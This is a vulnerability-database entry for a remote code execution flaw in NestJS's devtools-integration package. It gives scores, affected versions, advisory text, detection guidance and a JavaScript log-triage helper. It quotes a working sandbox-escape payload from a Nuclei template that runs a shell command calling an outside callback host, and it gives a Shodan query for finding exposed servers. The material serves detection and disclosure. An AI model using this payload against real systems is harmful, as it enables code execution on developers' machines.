CVE-2025-54782
Published: 2025-08-02
Priority: high; CVSS 3.1 base score 8.8
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
In the wild: exploited (VulnCheck KEV); initial access
Exploited in the wild
EPSS: 46.17% (98.7th percentile)
Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox. This is fixed in version 0.2.1.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nestjs | devtools-integration | < 0.2.1 | 0.2.1 |
| nestjs | devtools-integration | >= 0 < 0.2.1 | 0.2.1 |
| nestjs | nest | < 0.2.1 | 0.2.1 |
Detection & IOCs (extracted from sources)
command (Nuclei template request):

```http
POST /inspector/graph/interact HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain

{"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('nslookup {{interactsh-url}}')}})()"}
```

other: shodan-query: "devtools.nestjs.com"
- Monitor for POST requests to /inspector/graph/interact on locally running NestJS development servers; the endpoint accepts a JSON body with a 'code' field for arbitrary execution.
- Detect the sandbox-escape pattern that uses propertyIsEnumerable.call() to obtain the constructor chain and reach process.mainModule.require('child_process') from within the vm.runInNewContext sandbox.
- Requests to /inspector/graph/interact with Content-Type: text/plain that return HTTP 200 with an application/plain content-type in the response are indicative of successful exploitation.
- Use the Shodan query 'devtools.nestjs.com' to identify internet-exposed NestJS DevTools integration servers vulnerable to this RCE.
- The vulnerability is present in @nestjs/devtools-integration versions 0.2.0 and below; flag any deployment of these versions with the devtools integration enabled.
- The vulnerable endpoint is only exposed when the @nestjs/devtools-integration package is explicitly enabled in a NestJS application, typically only in local development environments, not in production by default.
- Exploitation can be triggered cross-origin (CSRF-style) by any malicious website visited by the developer, because of the missing cross-origin protections; no direct network access to the developer machine is required.
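The detection points above, turned into a small log-triage helper as an added example (not code from the advisory, the Nuclei template or the NestJS project). The log-line format and the sample traffic are constructed; the marker strings are the ones quoted on this page.

```javascript
// Added example: apply the page's indicators to constructed access-log lines
// of the form "<method> <path> <status> <req-ctype> <res-ctype> <body>".
const VULN_PATH = "/inspector/graph/interact";

// Fragments of the vm sandbox-escape chain quoted in the Nuclei request.
const ESCAPE_MARKERS = [
  "propertyIsEnumerable.call",
  "constructor.constructor",
  "mainModule.require",
  "child_process",
];

// Parse one constructed log line; returns null for lines that do not match.
function parseLine(line) {
  const m = line.match(/^(\S+) (\S+) (\d{3}) (\S+) (\S+) (.*)$/);
  if (!m) return null;
  return { method: m[1], path: m[2], status: Number(m[3]),
           reqType: m[4], resType: m[5], body: m[6] };
}

// Classify a parsed request against the indicators listed on this page.
function classify(req) {
  if (!req || req.method !== "POST" || req.path !== VULN_PATH) return "none";
  const hits = ESCAPE_MARKERS.filter((s) => req.body.includes(s)).length;
  // text/plain request answered with 200 + application/plain: likely success.
  const success = req.reqType === "text/plain" && req.status === 200 &&
                  req.resType === "application/plain";
  if (success && hits >= 2) return "exploited";
  if (hits >= 2) return "sandbox-escape-attempt";
  return "suspicious-post";   // any POST to the endpoint deserves a look
}

// Return the non-benign classifications for a batch of log lines.
function triage(lines) {
  return lines.map(parseLine).map(classify).filter((c) => c !== "none");
}

// Constructed sample traffic: a benign GET, a plain probe, and an escape
// attempt that carries the constructor-chain markers from the page.
const SAMPLE = [
  "GET /inspector/graph 200 - application/json -",
  'POST /inspector/graph/interact 200 application/json application/json {"code":"1+1"}',
  'POST /inspector/graph/interact 200 text/plain application/plain {"code":"(function(){try{propertyIsEnumerable.call()}catch(e){e.constructor.constructor(\'return process\')().mainModule.require(\'child_process\')}})()"}',
];
console.log(triage(SAMPLE));
```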
CVSS provenance
- NVD v3.1: 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
- NVD v4.0: 9.4 CRITICAL, CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
- VulnCheck: 9.4 CRITICAL
GHSA
@nestjs/devtools-integration: CSRF to Sandbox Escape Allows for RCE against JS Developers
ghsa · 2025-08-01 · CRITICAL · CWE-352
## Summary
A critical Remote Code Execution (RCE) vulnerability was discovered in the `@nestjs/devtools-integration` package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (`safe-eval`-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine.
A full blog post about how this vulnerability was uncovered can be found on [Socket's blog](https://socket.dev/blog/nestjs-rce-vuln).
## Details
The `@nestjs/devtools-integration` package adds HTTP endpoints to a locally running NestJS development server. One
OSV
@nestjs/devtools-integration: CSRF to Sandbox Escape Allows for RCE against JS Developers
osv · 2025-08-01 · CRITICAL
VulnCheck
nestjs devtools-integration: Improper Neutralization of Special Elements used in a Command ('Command Injection')
vulncheck · 2025 · CVSS 9.4 · CRITICAL
No detection rules found.
Nuclei
NestJS DevTools Integration - Remote Code Execution
nuclei · CVSS 9.4 · CRITICAL
No writeups or analysis indexed.
References
- https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-poc
- https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration
- https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7
- https://nodejs.org/api/vm.html
- https://socket.dev/blog/nestjs-rce-vuln